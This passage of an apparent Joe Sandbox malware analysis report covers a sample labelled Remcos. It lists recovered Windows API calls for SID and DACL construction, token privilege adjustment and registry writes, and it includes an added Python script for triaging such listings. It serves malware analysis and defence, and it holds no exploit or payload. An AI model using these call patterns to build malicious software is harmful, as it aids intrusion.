                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressFileInfoProcSizeSleepVersion
                                                                • String ID: GetFileVersionInfoSizeW
                                                                • API String ID: 1244426142-1049618512

                                                                 Control-flow Graph
                                                                APIs
                                                                • memset.MSVCRT ref: 003890B2
                                                                  • Part of subcall function 00389002: lstrlenW.KERNEL32(OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00389019
                                                                • LoadLibraryW.KERNELBASE(?), ref: 003890D3
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoadlstrlenmemset
                                                                • String ID:
                                                                • API String ID: 3555077121-0

                                                                 Control-flow Graph
                                                                APIs
                                                                • GlobalAlloc.KERNELBASE(00000040,00000000,00000000,00000001,00000000,?,00385E28,00000100), ref: 003887A2
                                                                • GlobalFree.KERNEL32(?), ref: 003887C0
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree
                                                                • String ID:
                                                                • API String ID: 3394109436-0

                                                                 Control-flow Graph
                                                                APIs
                                                                • SetProcessMitigationPolicy.KERNEL32(00000000,?,00000008,?,?,?,00387D64,0038A2D0,00000024,00389480,00380000,00000000,00000002,0000000A), ref: 00387D39
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0

                                                                 Control-flow Graph
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0

                                                                 Control-flow Graph
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                 • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                 • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: FreeGlobal
                                                                • String ID:
                                                                • API String ID: 2979337801-0
                                                                APIs
                                                                • FreeSid.ADVAPI32(?), ref: 00383256
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383274
                                                                • FreeSid.ADVAPI32(?), ref: 00383292
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003832B0
                                                                • FreeSid.ADVAPI32(?), ref: 003832CE
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003832F0
                                                                • FreeSid.ADVAPI32(?), ref: 0038330E
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0038332C
                                                                • FreeSid.ADVAPI32(?), ref: 0038334A
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000014,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383368
                                                                • FreeSid.ADVAPI32(?), ref: 003833CF
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003833EC
                                                                • FreeSid.ADVAPI32(?), ref: 0038340A
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383428
                                                                • FreeSid.ADVAPI32(?), ref: 00383446
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383468
                                                                • FreeSid.ADVAPI32(?), ref: 003834A2
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003834C0
                                                                • FreeSid.ADVAPI32(?), ref: 003834DE
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383500
                                                                • FreeSid.ADVAPI32(?), ref: 00383548
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383566
                                                                • FreeSid.ADVAPI32(?), ref: 00383584
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003835A6
                                                                • FreeSid.ADVAPI32(?), ref: 003835C4
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003835E2
                                                                • FreeSid.ADVAPI32(?), ref: 00383628
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383646
                                                                • FreeSid.ADVAPI32(?), ref: 00383664
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383686
                                                                • FreeSid.ADVAPI32(?), ref: 003836AE
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003836CC
                                                                • FreeSid.ADVAPI32(?), ref: 003836EA
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383707
                                                                • FreeSid.ADVAPI32(?), ref: 00383725
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383747
                                                                • GetLengthSid.ADVAPI32(?), ref: 003837A0
                                                                • memset.MSVCRT ref: 003837C5
                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 003837E8
                                                                • InitializeAcl.ADVAPI32(?,?,00000002), ref: 00383816
                                                                • AddAccessAllowedAce.ADVAPI32(?,00000002,?,?), ref: 00383842
                                                                • GetAce.ADVAPI32(?,?,?), ref: 0038385D
                                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00383887
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0038389D
                                                                • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 003838AE
                                                                • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 003838C7
                                                                • GetSecurityDescriptorLength.ADVAPI32(?), ref: 003838D6
                                                                • MakeSelfRelativeSD.ADVAPI32(?,?,?), ref: 003838F3
                                                                • GetLastError.KERNEL32 ref: 003838FD
                                                                • GlobalFree.KERNEL32(?), ref: 00383918
                                                                • GetLastError.KERNEL32 ref: 00383920
                                                                • FreeSid.ADVAPI32(?), ref: 0038393D
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: FreeInitialize$Allocate$DescriptorSecurity$ErrorGlobalLastLength$AccessAllocAllowedDaclGroupMakeOwnerRelativeSelfmemset
                                                                • String ID:
                                                                • API String ID: 3802846876-0
                                                                • Opcode ID: 8ea299a8c61c4fc4876976747f9fddadb10aba79e01a71cb853d9baf142ed5b8
                                                                • Instruction ID: 43c35ea44b040aa72f6025a194e9779048f7983476faa2bb1e0379bded927d23
                                                                • Opcode Fuzzy Hash: 8ea299a8c61c4fc4876976747f9fddadb10aba79e01a71cb853d9baf142ed5b8
                                                                • Instruction Fuzzy Hash: E51229B1508345AFDB22AF61DC88BABB7ECFB84B41F1048ADF584D6290D771D905CB12
                                                                APIs
                                                                • GetLastError.KERNEL32(00000020,00000000,00000000), ref: 00385A12
                                                                • RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 00385A8A
                                                                • RegCloseKey.ADVAPI32(?), ref: 00385AAA
                                                                • GlobalFree.KERNEL32(?), ref: 00385ABF
                                                                • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00385B14
                                                                • RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 00385B35
                                                                • lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 00385B3C
                                                                • RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 00385B59
                                                                • RegCloseKey.ADVAPI32(?), ref: 00385B65
                                                                • memset.MSVCRT ref: 00385B84
                                                                • OutputDebugStringW.KERNEL32(?), ref: 00385BD4
                                                                • SetLastError.KERNEL32(00000000), ref: 00385BDB
                                                                  • Part of subcall function 00382F5E: RegOpenKeyExW.ADVAPI32(80000002,Software\Policies\Microsoft\Windows\Installer,00000000,00020019,HZ8,?,00385A48,?,?,?), ref: 00382F8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Value$CloseErrorLast$CreateDebugFreeGlobalOpenOutputQueryStringlstrlenmemset
                                                                • String ID: %s$($Debug$Error: %d. %s.$LastError$LastErrorMessage$P$ServerMain (CA): Open synchronization event failed$Software\Microsoft\Windows\CurrentVersion\Installer\CA$Software\Policies\Microsoft\Windows\Installer
                                                                • API String ID: 3407900974-1723650419
                                                                • Opcode ID: 940223a9b117a5d493d9dd126f20475bd7276facd52ab7addd8a68049139c7af
                                                                • Instruction ID: 041a4343f306ce5a336ccad8020796b39cd7c0a057f47b36efda1e25388c0643
                                                                • Opcode Fuzzy Hash: 940223a9b117a5d493d9dd126f20475bd7276facd52ab7addd8a68049139c7af
                                                                • Instruction Fuzzy Hash: 11513AB190031CEBEB23AB61DC85FAA77BCFB04345F0541E5E549A6190EA768E85CF90
                                                                APIs
                                                                • memset.MSVCRT ref: 00385CAD
                                                                • GetACP.KERNEL32(00000641,?,00000000), ref: 00385CE3
                                                                • LoadLibraryW.KERNEL32(KERNEL32), ref: 00385CF0
                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00385D02
                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,0000000A), ref: 00385D38
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00385D46
                                                                • FormatMessageW.KERNEL32(00001000,00000000,00000641,?,?,00000401,00000000), ref: 00385D6C
                                                                • memset.MSVCRT ref: 00385DEE
                                                                • GetVersionExW.KERNEL32(0000011C), ref: 00385E07
                                                                  • Part of subcall function 00382E35: _vsnwprintf.MSVCRT ref: 00382E67
                                                                • lstrlenW.KERNEL32(?), ref: 00385E96
                                                                • WriteFile.KERNEL32(?,00000000,?,00000000), ref: 00385EB4
                                                                • WriteFile.KERNEL32(00382638,00000004,?,00000000), ref: 00385ECF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: FileLibraryWritememset$AddressFormatFreeInfoLoadLocaleMessageProcVersion_vsnwprintflstrlen
                                                                • String ID: GetUserDefaultUILanguage$Install error %i$KERNEL32
                                                                • API String ID: 2411759445-2065445882
                                                                • Opcode ID: afeab26b18618e10548e39c3070196303d625a257cd73226b07ae991c0a01c29
                                                                • Instruction ID: 6e29a525fea692648783c74667b693ed7f18e011d090d7ca0ba3a54c625b0900
                                                                • Opcode Fuzzy Hash: afeab26b18618e10548e39c3070196303d625a257cd73226b07ae991c0a01c29
                                                                • Instruction Fuzzy Hash: 83517EB1900318ABEB12AB60DC89EFB77BCFB08365F1405E5F915E61D1EA70DE458B60
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 00382FC1
                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 00382FC8
                                                                • GetLastError.KERNEL32 ref: 00382FD2
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00382FE9
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00382FF0
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0038300F
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000030,?,?), ref: 0038303B
                                                                • CloseHandle.KERNEL32(?), ref: 00383044
                                                                • GetLastError.KERNEL32 ref: 0038304A
                                                                • CloseHandle.KERNEL32(?), ref: 00383068
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Token$CloseCurrentErrorHandleLastOpenProcessThread$AdjustLookupPrivilegePrivilegesValue
                                                                • String ID:
                                                                • API String ID: 268630328-0
                                                                • Opcode ID: 8bd7b3f30d3d14dec5fffb0d563ece9995a0d4acf3af3510e7368103e7302a37
                                                                • Instruction ID: 913508ddcedd59be34bfa82213057b3a5b911b73e43516b43a9924eac69873e6
                                                                • Opcode Fuzzy Hash: 8bd7b3f30d3d14dec5fffb0d563ece9995a0d4acf3af3510e7368103e7302a37
                                                                • Instruction Fuzzy Hash: BF212DB1A00309EFDF12AFA5ED49B9DBBBDEF04701F104065F502E61A0DB7199028B21
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 00383133
                                                                • GetLastError.KERNEL32(?,?), ref: 0038313D
                                                                • GetLengthSid.ADVAPI32(?,?,?), ref: 00383148
                                                                • FreeSid.ADVAPI32(00000000), ref: 0038315E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AllocateErrorFreeInitializeLastLength
                                                                • String ID:
                                                                • API String ID: 1611457584-0
                                                                • Opcode ID: d556334c5e90020cfe79bb0c0df4bbc4f1dbb0db8e3ff6a00bdc16ae16fc5b17
                                                                • Instruction ID: 72f9df0caea98c0b8491b47605690668c9eb38258a47b94557746601aacb3b85
                                                                • Opcode Fuzzy Hash: d556334c5e90020cfe79bb0c0df4bbc4f1dbb0db8e3ff6a00bdc16ae16fc5b17
                                                                • Instruction Fuzzy Hash: 4C1163B0910308EFDB07BBA4DC0DABEBB7CFB04B04F1044A9E412922A0D7718904DB10
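The function listings above give only raw call lines: the DACL-building function (the long AllocateAndInitializeSid / InitializeAcl / AddAccessAllowedAce / SetSecurityDescriptorDacl sequence), the token function (OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges) and the small SID helper just above. The following triage script is an added example, not part of the report or of the analysed sample: it parses lines in the report's own format into per-function call sequences, rebuilds the SID each AllocateAndInitializeSid call constructs, and flags functions that adjust token privileges. Two assumptions are built in and labelled in the code: the identifier-authority pointer is shown only as `?`, so SIDs are decoded under NT AUTHORITY (S-1-5) unless told otherwise, and the privilege name handed to LookupPrivilegeValueW is likewise a pointer the listing does not resolve, so the script reports the pattern, not which privilege is enabled. The sample input is constructed from lines in the listing. One caveat worth keeping in mind when reading these blocks: the surrounding strings (MSIServer, "Install error %i", the Installer\CA registry path, "ServerMain (CA)") are Windows Installer service strings, so this DACL and privilege code most plausibly belongs to the host image in process 10 rather than to the injected payload; treat the decoded SIDs as context for the host, not as RAT behaviour.

```python
"""Turn Joe Sandbox 'APIs' function listings into call sequences, rebuild the
SIDs passed to AllocateAndInitializeSid, and flag token-privilege adjustment.

Added triage helper; it is not part of the report or of the analysed sample.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample: a handful of lines copied in the report's own format.
SAMPLE = r"""APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003832B0
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003832F0
• GetLengthSid.ADVAPI32(?), ref: 003837A0
• memset.MSVCRT ref: 003837C5
• InitializeAcl.ADVAPI32(?,?,00000002), ref: 00383816
• AddAccessAllowedAce.ADVAPI32(?,00000002,?,?), ref: 00383842
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00382FE9
• OpenProcessToken.ADVAPI32(00000000), ref: 00382FF0
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0038300F
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000030,?,?), ref: 0038303B
  • Part of subcall function 00382F5E: RegOpenKeyExW.ADVAPI32(80000002,Software\Policies\Microsoft\Windows\Installer,00000000,00020019,HZ8,?,00385A48,?,?,?), ref: 00382F8B
"""

# One "• Api.MODULE(args), ref: ADDR" line. The argument list is optional
# ("memset.MSVCRT ref: ..."), and the greedy ".*" keeps string arguments that
# contain parentheses intact. "Part of subcall function ..." lines do not match
# and are skipped on purpose: they belong to a different function.
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]   # raw hex/pointer tokens; "?" means not recovered
    ref: str          # call-site address from the listing


def parse_listing(text: str) -> List[List[Call]]:
    """Split the listing at each 'APIs' header into one call list per function."""
    blocks: List[List[Call]] = []
    current: List[Call] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            if current:
                blocks.append(current)
            current = []
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        # Arguments are split on commas; string arguments containing commas
        # would need smarter tokenising (none occur in this listing).
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        current.append(Call(m["api"], m["module"], args, m["ref"]))
    if current:
        blocks.append(current)
    return blocks


# Assumption: the authority pointer is shown as "?" in the listing, so decode
# under NT AUTHORITY (5) by default; pass authority=1 for World/Everyone SIDs.
NT_AUTHORITY = 5
WELL_KNOWN: Dict[str, str] = {
    "S-1-1-0": "Everyone",
    "S-1-5-4": "NT AUTHORITY\\INTERACTIVE",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}


def decode_sid(call: Call, authority: int = NT_AUTHORITY) -> Tuple[str, str]:
    """Rebuild the SID from an AllocateAndInitializeSid call.
    Parameter layout: (pIdentifierAuthority, nSubAuthorityCount, sub0..sub7, ppSid)."""
    if call.api != "AllocateAndInitializeSid" or len(call.args) != 11:
        raise ValueError("not a complete AllocateAndInitializeSid call")
    count = int(call.args[1], 16)
    if not 1 <= count <= 8:
        raise ValueError("sub-authority count out of range")
    subs = [int(a, 16) for a in call.args[2:2 + count]]
    sid = f"S-1-{authority}-" + "-".join(str(s) for s in subs)
    return sid, WELL_KNOWN.get(sid, "not a well-known SID under the assumed authority")


def adjusts_privileges(block: List[Call]) -> bool:
    """True when a function opens a token, resolves a privilege LUID and then
    calls AdjustTokenPrivileges, in that order. The privilege name is passed by
    pointer ('?' in the listing), so which privilege is enabled is not known."""
    wanted = [{"OpenProcessToken", "OpenThreadToken"},
              {"LookupPrivilegeValueW", "LookupPrivilegeValueA"},
              {"AdjustTokenPrivileges"}]
    step = 0
    for call in block:
        if step < len(wanted) and call.api in wanted[step]:
            step += 1
    return step == len(wanted)


def summarize(text: str) -> Dict[str, object]:
    """Per-listing summary: function count, distinct decoded SIDs, and the
    indices of functions that adjust token privileges."""
    blocks = parse_listing(text)
    sids = {decode_sid(c) for b in blocks for c in b
            if c.api == "AllocateAndInitializeSid" and len(c.args) == 11}
    return {
        "functions": len(blocks),
        "sids": sorted(sids),
        "privilege_adjusting_functions": [i for i, b in enumerate(blocks) if adjusts_privileges(b)],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```

Run against the full report text, the summary lists every SID the DACL function builds (SYSTEM and Administrators repeatedly, plus INTERACTIVE, LOCAL SERVICE and NETWORK SERVICE) and flags the token function; the one-sub-authority SID with value 0 only resolves to Everyone if the authority really is World, which the listing cannot confirm.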
                                                                APIs
                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00389E62
                                                                • GetCurrentProcessId.KERNEL32 ref: 00389E71
                                                                • GetCurrentThreadId.KERNEL32 ref: 00389E7A
                                                                • GetTickCount.KERNEL32 ref: 00389E83
                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00389E98
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                • String ID:
                                                                • API String ID: 1445889803-0
                                                                • Opcode ID: ee06d2594ff8e6dad77b38d87ea45c451e8656da780bc17501b3afa5c69433b9
                                                                • Instruction ID: 702341ffa3746406a7bbf09fdd8d41a34286602cfac968ad8ebab3305e5613ee
                                                                • Opcode Fuzzy Hash: ee06d2594ff8e6dad77b38d87ea45c451e8656da780bc17501b3afa5c69433b9
                                                                • Instruction Fuzzy Hash: 9C111C71D11308EBCB11DBB8D9487AEBBF9FF48354F65489AD405E7250E7309A048B50
                                                                APIs
                                                                • StartServiceCtrlDispatcherW.ADVAPI32(?), ref: 00387DF2
                                                                • GetLastError.KERNEL32 ref: 00387DFC
                                                                  • Part of subcall function 003859F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 00385A12
                                                                  • Part of subcall function 003859F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 00385A8A
                                                                  • Part of subcall function 003859F2: RegCloseKey.ADVAPI32(?), ref: 00385AAA
                                                                  • Part of subcall function 003859F2: GlobalFree.KERNEL32(?), ref: 00385ABF
                                                                  • Part of subcall function 003859F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00385B14
                                                                  • Part of subcall function 003859F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 00385B35
                                                                  • Part of subcall function 003859F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 00385B3C
                                                                  • Part of subcall function 003859F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 00385B59
                                                                  • Part of subcall function 003859F2: RegCloseKey.ADVAPI32(?), ref: 00385B65
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmp
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Value$CloseErrorLast$CreateCtrlDispatcherFreeGlobalQueryServiceStartlstrlen
                                                                • String ID: MSIServer$StartServiceCtrlDispatcher failed.
                                                                • API String ID: 2998827721-520530687
                                                                • Opcode ID: a384243abb39020a715f278aa2aa6d481469e81c9983715192177df837decb4a
                                                                • Instruction ID: a0e93b79e3b77dd8719da117f33469b10e466e3bd39e29ece49799e255aba972
                                                                • Opcode Fuzzy Hash: a384243abb39020a715f278aa2aa6d481469e81c9983715192177df837decb4a
                                                                • Instruction Fuzzy Hash: AEE0D871E103089BDF02FBB4C8097AE7BFDEB40309F1044E4D115E2180DB70D9068B51
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00389726,00381000), ref: 003895F7
                                                                • UnhandledExceptionFilter.KERNEL32(00389726,?,00389726,00381000), ref: 00389600
